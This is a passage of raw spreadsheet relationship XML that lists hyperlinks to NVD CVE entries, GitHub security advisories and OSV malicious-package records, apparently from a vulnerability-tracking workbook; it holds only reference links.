Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16434" TargetMode="External" Id="rId2319" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73087" TargetMode="External" Id="rId2320" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82060" TargetMode="External" Id="rId2321" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82710" TargetMode="External" Id="rId2322" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58234" TargetMode="External" Id="rId2323" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84225" TargetMode="External" Id="rId2324" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85458" TargetMode="External" Id="rId2325" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85513" TargetMode="External" Id="rId2326" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86163" TargetMode="External" Id="rId2327" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86164" TargetMode="External" Id="rId2328" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86171" TargetMode="External" Id="rId2329" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86182" TargetMode="External" Id="rId2330" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86216" TargetMode="External" Id="rId2331" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86228" TargetMode="External" Id="rId2332" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86232" TargetMode="External" Id="rId2333" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86512" TargetMode="External" Id="rId2334" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86514" TargetMode="External" Id="rId2335" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86515" TargetMode="External" Id="rId2336" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86517" TargetMode="External" Id="rId2337" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86518" TargetMode="External" Id="rId2338" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86668" TargetMode="External" Id="rId2339" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86674" TargetMode="External" Id="rId2340" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86675" TargetMode="External" Id="rId2341" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-8769" TargetMode="External" Id="rId2342" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16003" TargetMode="External" Id="rId2343" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85406" TargetMode="External" Id="rId2344" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85643" TargetMode="External" Id="rId2345" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86150" TargetMode="External" Id="rId2346" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86226" TargetMode="External" Id="rId2347" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86644" TargetMode="External" Id="rId2348" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86667" TargetMode="External" Id="rId2349" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9215" TargetMode="External" Id="rId2350" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9216" TargetMode="External" Id="rId2351" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-59057" TargetMode="External" Id="rId2352" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12259" TargetMode="External" Id="rId2353" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15603" TargetMode="External" Id="rId2354" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19693" TargetMode="External" Id="rId2355" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21884" TargetMode="External" Id="rId2356" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33244" TargetMode="External" Id="rId2357" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-37004" TargetMode="External" Id="rId2358" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-41855" TargetMode="External" Id="rId2359" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45219" TargetMode="External" Id="rId2360" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45220" TargetMode="External" Id="rId2361" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49114" TargetMode="External" Id="rId2362" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49153" TargetMode="External" Id="rId2363" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49154" TargetMode="External" Id="rId2364" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49155" TargetMode="External" Id="rId2365" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49156" TargetMode="External" Id="rId2366" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50646" TargetMode="External" Id="rId2367" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53668" TargetMode="External" Id="rId2368" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62900" TargetMode="External" Id="rId2369" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65915" TargetMode="External" Id="rId2370" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67322" TargetMode="External" Id="rId2371" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67323" TargetMode="External" Id="rId2372" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67325" TargetMode="External" Id="rId2373" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68584" TargetMode="External" Id="rId2374" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69222" TargetMode="External" Id="rId2375" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70613" TargetMode="External" Id="rId2376" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70614" TargetMode="External" Id="rId2377" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72789" TargetMode="External" Id="rId2378" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72790" TargetMode="External" Id="rId2379" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72925" TargetMode="External" Id="rId2380" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73262" TargetMode="External" Id="rId2381" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73294" TargetMode="External" Id="rId2382" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73558" TargetMode="External" Id="rId2383" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73560" TargetMode="External" Id="rId2384" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73843" TargetMode="External" Id="rId2385" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75604" TargetMode="External" Id="rId2386" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76217" TargetMode="External" Id="rId2387" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76218" TargetMode="External" Id="rId2388" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76219" TargetMode="External" Id="rId2389" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76220" TargetMode="External" Id="rId2390" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76222" TargetMode="External" Id="rId2391" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77037" TargetMode="External" Id="rId2392" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77063" TargetMode="External" Id="rId2393" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77078" TargetMode="External" Id="rId2394" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-7809" TargetMode="External" Id="rId2395" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78678" TargetMode="External" Id="rId2396" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78679" TargetMode="External" Id="rId2397" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82333" TargetMode="External" Id="rId2398" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82514" TargetMode="External" Id="rId2399" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84308" TargetMode="External" Id="rId2400" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84363" TargetMode="External" Id="rId2401" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84364" TargetMode="External" Id="rId2402" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84365" TargetMode="External" Id="rId2403" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84367" TargetMode="External" Id="rId2404" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84368" TargetMode="External" Id="rId2405" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84369" TargetMode="External" Id="rId2406" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84370" TargetMode="External" Id="rId2407" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84372" TargetMode="External" Id="rId2408" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84373" TargetMode="External" Id="rId2409" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84374" TargetMode="External" Id="rId2410" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84375" TargetMode="External" Id="rId2411" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84378" TargetMode="External" Id="rId2412" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84379" TargetMode="External" Id="rId2413" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84380" TargetMode="External" Id="rId2414" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84381" TargetMode="External" Id="rId2415" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84382" TargetMode="External" Id="rId2416" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84445" TargetMode="External" Id="rId2417" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85061" TargetMode="External" Id="rId2418" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86477" TargetMode="External" Id="rId2419" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-26w7-cxv4-gfx2" TargetMode="External" Id="rId2420" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-2q33-cf8w-7q23" TargetMode="External" Id="rId2421" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-2q42-4q24-7rgv" TargetMode="External" Id="rId2422" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-2x7j-588g-ccc2" TargetMode="External" Id="rId2423" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16045" TargetMode="External" Id="rId2424" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16042" TargetMode="External" Id="rId2425" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-4qhr-qf46-fcrx" TargetMode="External" Id="rId2426" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-57v5-wqx3-cgj4" TargetMode="External" Id="rId2427" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-8m3c-c648-2xjj" TargetMode="External" Id="rId2428" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16047" TargetMode="External" Id="rId2429" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16046" TargetMode="External" Id="rId2430" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-cc9r-2j5m-2m83" TargetMode="External" Id="rId2431" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-cvhv-g4rq-3hmw" TargetMode="External" Id="rId2432" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16043" TargetMode="External" Id="rId2433" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-mqvm-gmc4-6rv2" TargetMode="External" Id="rId2434" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-q72m-f2r4-w4cw" TargetMode="External" Id="rId2435" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-v3f6-m9j2-437p" TargetMode="External" Id="rId2436" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-wmmp-3585-3rmp" TargetMode="External" Id="rId2437" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16048" TargetMode="External" Id="rId2438" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16049" TargetMode="External" Id="rId2439" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16050" TargetMode="External" Id="rId2440" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16051" TargetMode="External" Id="rId2441" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16052" TargetMode="External" Id="rId2442" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16056" TargetMode="External" Id="rId2443" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16057" TargetMode="External" Id="rId2444" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16058" TargetMode="External" Id="rId2445" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16199" TargetMode="External" Id="rId2446" /></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet3.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6-81963" TargetMode="External" Id="rId5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85880" TargetMode="External" Id="rId6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-25249" TargetMode="External" Id="rId7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19490" TargetMode="External" Id="rId8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20079" TargetMode="External" Id="rId9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42016" TargetMode="External" Id="rId10" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42018" TargetMode="External" Id="rId11" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67277" TargetMode="External" Id="rId12" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75650" TargetMode="External" Id="rId13" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76460" TargetMode="External" Id="rId14" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76461" TargetMode="External" Id="rId15" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85706" TargetMode="External" Id="rId16" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86060" TargetMode="External" Id="rId17" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86218" TargetMode="External" Id="rId18" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87886" TargetMode="External" Id="rId19" /></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet4.xml.rels><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84869"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5046" TargetMode="External" Id="rId3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87491" TargetMode="External" Id="rId4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81963" TargetMode="External" Id="rId5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85880" TargetMode="External" Id="rId6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-60004" TargetMode="External" Id="rId7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44756" TargetMode="External" Id="rId8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62815" TargetMode="External" Id="rId9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70352" TargetMode="External" Id="rId10" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77995" TargetMode="External" Id="rId11" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77998" TargetMode="External" Id="rId12" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80098" TargetMode="External" Id="rId13" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82004" TargetMode="External" Id="rId14" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83711" TargetMode="External" Id="rId15" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12645" TargetMode="External" Id="rId16" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12646" TargetMode="External" Id="rId17" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12647" TargetMode="External" Id="rId18" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12650" TargetMode="External" Id="rId19" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19232" TargetMode="External" Id="rId20" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-26084" TargetMode="External" Id="rId21" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48273" TargetMode="External" Id="rId22" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55565" TargetMode="External" Id="rId23" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65818" TargetMode="External" Id="rId24" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78234" TargetMode="External" Id="rId25" /><Relationship 